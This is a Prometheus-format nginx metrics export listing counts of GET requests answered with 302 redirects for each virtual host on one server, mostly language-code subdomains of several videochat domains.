nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lv.videochat.cafe"} 1010 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lv.videochat.date"} 2523 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lv.videochat.mx"} 1874 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lv.videochat.show"} 296 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lv.videochat.tv.br"} 1119 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lv.videochat.world"} 3453 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lvepabs.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mail.videochat.mx"} 248 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mg.videochat.cafe"} 1435 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mg.videochat.date"} 542 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mg.videochat.mx"} 1565 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mg.videochat.show"} 422 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mg.videochat.tv.br"} 1231 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mg.videochat.world"} 3405 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mi.videochat.cafe"} 1002 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mi.videochat.date"} 695 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mi.videochat.mx"} 1609 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mi.videochat.show"} 379 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mi.videochat.tv.br"} 1765 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mi.videochat.world"} 1358 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="miqnrka.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mjrwumn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mk.videochat.cafe"} 1033 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mk.videochat.date"} 2783 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mk.videochat.mx"} 1573 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mk.videochat.show"} 321 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mk.videochat.tv.br"} 942 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mk.videochat.world"} 2627 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ml.videochat.cafe"} 820 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ml.videochat.date"} 268 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ml.videochat.mx"} 1583 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ml.videochat.show"} 156 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ml.videochat.tv.br"} 666 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ml.videochat.world"} 2478 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mn.videochat.cafe"} 1009 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mn.videochat.date"} 309 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mn.videochat.mx"} 1494 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mn.videochat.show"} 314 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mn.videochat.tv.br"} 918 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mn.videochat.world"} 3101 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mpositesmodeca.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mr.videochat.cafe"} 2463 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mr.videochat.date"} 221 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mr.videochat.mx"} 1057 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mr.videochat.show"} 639 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mr.videochat.tv.br"} 1087 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mr.videochat.world"} 2694 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mrj.videochat.cafe"} 1082 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mrj.videochat.date"} 393 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mrj.videochat.mx"} 1839 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mrj.videochat.show"} 541 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mrj.videochat.tv.br"} 1549 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mrj.videochat.world"} 1343 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ms.videochat.cafe"} 855 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ms.videochat.date"} 390 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ms.videochat.mx"} 1552 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ms.videochat.show"} 168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ms.videochat.tv.br"} 807 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ms.videochat.world"} 2268 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="msehgsk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mt.videochat.cafe"} 1945 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mt.videochat.date"} 593 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mt.videochat.mx"} 3466 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mt.videochat.show"} 356 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mt.videochat.tv.br"} 1313 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mt.videochat.world"} 3970 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mta-sts.videochat.mx"} 200 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mwxipmt.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mxnkcsw.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="my.videochat.cafe"} 901 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="my.videochat.date"} 244 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="my.videochat.mx"} 1318 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="my.videochat.show"} 526 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="my.videochat.tv.br"} 1099 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="my.videochat.world"} 2408 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ncawath.videochat.mx"} 369 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nd-homes-vi.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ne.videochat.cafe"} 1296 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ne.videochat.date"} 946 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ne.videochat.mx"} 2926 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ne.videochat.show"} 994 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ne.videochat.tv.br"} 2789 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ne.videochat.world"} 2578 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="new.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nkrphet.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nl.videochat.cafe"} 891 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nl.videochat.date"} 225 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nl.videochat.mx"} 1496 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nl.videochat.show"} 200 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nl.videochat.tv.br"} 962 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nl.videochat.world"} 3450 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="no.videochat.cafe"} 871 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="no.videochat.date"} 2228 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="no.videochat.mx"} 3143 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="no.videochat.show"} 304 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="no.videochat.tv.br"} 736 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="no.videochat.world"} 2865 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nopuekm.videochat.mx"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nsalsno.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nuoqyen.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nvuxhmi.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nymwkpl.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nyucsbg.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="occjlro.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ogbzzro.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ohrazfi.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ohxaovdqcuyi.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ojhbsnl.videochat.mx"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="oktuuel.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="oliedtr.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="olprgel.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="omsco.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="orientalcarpetcreationbbluebasilbrohml.videochat.mx"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="osu.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="otrvbsi.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="oxlioar.videochat.mx"} 344 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ozoejel.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pa.videochat.cafe"} 1189 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pa.videochat.date"} 377 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pa.videochat.mx"} 1542 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pa.videochat.show"} 433 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pa.videochat.tv.br"} 1142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pa.videochat.world"} 2410 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="panel.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="panicbot.net"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pap.videochat.cafe"} 809 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pap.videochat.date"} 348 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pap.videochat.mx"} 1687 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pap.videochat.show"} 170 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pap.videochat.tv.br"} 836 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pap.videochat.world"} 966 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pbszvar.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pdxecxblqbkn.videochat.mx"} 314 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pgrnikk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="phishdestroy.io"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pkiaram.videochat.mx"} 384 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pl.videochat.cafe"} 2611 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pl.videochat.date"} 3087 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pl.videochat.mx"} 1684 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pl.videochat.show"} 246 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pl.videochat.tv.br"} 810 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pl.videochat.world"} 3252 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="portal.halocloudnet.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="prfhspa.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="prod.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="production.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pt.videochat.cafe"} 4466 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pt.videochat.date"} 1369 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pt.videochat.mx"} 1518 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pt.videochat.show"} 267 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pt.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pt.videochat.world"} 3794 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pviwrky.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="qaapiml.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="qazwgnl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="qbzgomg.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="qdrqgda.videochat.mx"} 309 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="qotztte.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="qouyvchm.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="qshicka.videochat.mx"} 425 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="qvcrmgu.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="qvsiwis.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="qxflfkk.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="razilca.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="rbohjhr.videochat.mx"} 368 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="rcmjkkm.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="rcmklda.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="rcxxhxh.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="reiseservice-stender.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="rjlrspap.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ro.videochat.cafe"} 1055 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ro.videochat.date"} 2493 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ro.videochat.mx"} 3677 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ro.videochat.show"} 373 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ro.videochat.tv.br"} 945 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ro.videochat.world"} 1438 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ryfusmrj.videochat.mx"} 427 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sandbox.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sco.videochat.cafe"} 1037 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sco.videochat.date"} 399 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sco.videochat.mx"} 4061 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sco.videochat.show"} 269 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sco.videochat.tv.br"} 1272 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sco.videochat.world"} 1837 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sdun.io"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sefi.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="semjnsl.videochat.mx"} 434 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sfjtyzh.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="shgpjid.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="si.videochat.cafe"} 1060 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="si.videochat.date"} 1155 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="si.videochat.mx"} 1463 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="si.videochat.show"} 779 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="si.videochat.tv.br"} 1335 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="si.videochat.world"} 1688 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sitemap.videochat.mx"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sitemaps.videochat.mx"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sk.videochat.cafe"} 1388 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sk.videochat.date"} 2487 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sk.videochat.mx"} 3729 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sk.videochat.show"} 271 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sk.videochat.tv.br"} 964 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sk.videochat.world"} 3188 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sl.videochat.cafe"} 1542 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sl.videochat.date"} 3279 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sl.videochat.mx"} 1437 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sl.videochat.show"} 1192 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sl.videochat.tv.br"} 1238 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sl.videochat.world"} 2926 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="slvdtur.videochat.mx"} 185 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sptlqmk.videochat.mx"} 352 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sr.videochat.cafe"} 1582 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sr.videochat.date"} 3013 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sr.videochat.mx"} 1332 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sr.videochat.show"} 166 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sr.videochat.tv.br"} 1399 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sr.videochat.world"} 2092 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="staging.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="stl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="su.videochat.cafe"} 1233 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="su.videochat.date"} 291 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="su.videochat.mx"} 1168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="su.videochat.show"} 315 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="su.videochat.tv.br"} 772 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="su.videochat.world"} 910 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sv.videochat.cafe"} 3183 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sv.videochat.date"} 2841 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sv.videochat.mx"} 1228 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sv.videochat.show"} 468 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sv.videochat.tv.br"} 888 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sv.videochat.world"} 1516 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sw.videochat.cafe"} 975 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sw.videochat.date"} 289 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sw.videochat.mx"} 1775 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sw.videochat.show"} 285 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sw.videochat.tv.br"} 883 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sw.videochat.world"} 987 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ta.videochat.cafe"} 1064 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ta.videochat.date"} 438 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ta.videochat.mx"} 1814 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ta.videochat.show"} 228 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ta.videochat.tv.br"} 1283 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ta.videochat.world"} 1604 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="te.videochat.cafe"} 1225 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="te.videochat.date"} 810 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="te.videochat.mx"} 1469 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="te.videochat.show"} 259 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="te.videochat.tv.br"} 808 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="te.videochat.world"} 2872 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="test.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tfijrlilvami.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tfqsslt.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tg.videochat.cafe"} 1408 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tg.videochat.date"} 519 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tg.videochat.mx"} 1437 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tg.videochat.show"} 505 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tg.videochat.tv.br"} 1158 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tg.videochat.world"} 3707 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="th.videochat.cafe"} 906 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="th.videochat.date"} 415 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="th.videochat.mx"} 1641 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="th.videochat.show"} 380 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="th.videochat.tv.br"} 1529 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="th.videochat.world"} 4471 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="thingsworko.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="thsvzsv.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tiplpqwctmaf.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tl.videochat.cafe"} 925 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tl.videochat.date"} 2826 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tl.videochat.mx"} 1748 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tl.videochat.show"} 288 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tl.videochat.tv.br"} 1222 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tl.videochat.world"} 3496 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tr.videochat.cafe"} 971 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tr.videochat.date"} 649 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tr.videochat.mx"} 1510 